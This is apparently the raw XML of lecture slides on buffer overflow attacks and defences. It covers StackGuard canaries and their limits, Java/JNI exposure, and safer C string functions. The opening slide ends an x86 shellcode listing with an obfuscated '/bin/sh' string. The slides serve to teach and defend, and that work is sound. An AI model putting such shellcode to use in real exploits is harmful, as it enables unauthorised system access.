              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xorl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ebx,%ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>        */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x89\xd8"                      /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ebx,%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>        */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x40"                          /* inc %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>              */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>\x80"                      /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> $0x80             */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\xe8\xc3\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>"          /* call -0x3d            */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>"     */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	                                /* /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> is disguised  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>----------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624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610C936-74BB-4378-BAC1-B1294127E8C6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>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b="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655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F73FBDB-279E-4B95-BAE4-25AC2E30ADC3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>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b="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="665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2241673-4ABD-472A-BAA1-154BFD33DB38}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">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0547AE-9D25-4E07-A93B-F6719D1B03C6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>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b="1" dirty="0" smtClean="0"/>
              <a:t>JVM: convert the Java byte code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (in .class) into the native code of the current machine</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{940C8AAE-5172-4B06-94E5-A3858A69D949}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>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145BBD5-C299-4960-9E11-1A9FA7AB86C2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25762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9A49341-23E5-4418-88F0-C02D93FEE7FF}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88668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FC8D7C47-A22C-4B1C-9DF2-EFF94C1A14BF}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21337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631889EB-A148-44C4-BCE4-6EB882987376}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43120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82957A2-36AC-44DD-BCC6-AF6187247EDA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428678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2681A732-9BF2-4514-A7DC-EC2E24632EB9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74044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FCEE274B-E35F-4283-BF94-ED5B5CC1942F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29812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BE8149B2-8D1E-4DEA-AB0A-24C25A57CAB4}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55481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6741AABC-25BA-4ACB-B48F-07D1638E0155}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421955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A56B97B-1E56-4DD0-9063-89D35FFA1498}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267340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CF7A7553-F861-4D8F-A3C7-C82F2058679E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263239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28600"/>
            <a:ext cx="77724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ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>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ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>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02E12040-6378-4A60-873E-EA69E997350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685800" y="2286000"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Buffer Overflow (Part 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368A95A6-9F3F-4C12-90D4-A22C3CCE770E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="457200"/>
            <a:ext cx="7772400" cy="6172200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Solution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> is based on the following assumption:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>The return address is unaltered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>iff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> the canary word is unaltered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>But this assumption may not always hold</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If the canary value is known or can be guessed easily, the attack overflow string can include the canary word in the correct place </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>However, the following will increase the difficulties of the attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>One distinct word is used per function in the object code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The canary words are chosen at random when the program starts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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07EBF87D-6AEA-49A1-83E0-7EA8DCEDDE05}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27650" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Avoiding Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31748" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1524000"/>
            <a:ext cx="7772400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Modern Programming Languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Most modern programming languages are essentially immune to this problem in most cases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Automatically resize arrays. E.g. Perl, Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Detect and prevent buffer overflows. E.g. Ada95, Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>But under special circumstances, Java may still be vulnerable to buffer overflow attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>By Java Native Interface (JNI), we can call native applications and libraries written in other languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The Java Virtual Machine (JVM) itself may be vulnerable to buffer overflow attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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161CCCAA-DFFE-486A-A809-C1CF38BADE6E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="609600"/>
            <a:ext cx="7772400" cy="6019800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>But C/C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>++ can be easily used in ways to cause this problem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Careful Use of C/C++ Library Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Avoid using functions that do not check bounds, unless the bounds will never get exceeded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>gets()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The value returned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> may not be trustworthy unless we can guarantee that there must be a terminating NULL character.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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6B6F2A8-F4EE-4EC9-AA14-CC2A74725EE5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="609600"/>
            <a:ext cx="7772400" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Use newer libraries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Some suggest that we should use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> instead.</a:t>
            </a:r>
          </a:p>
          <a:p>
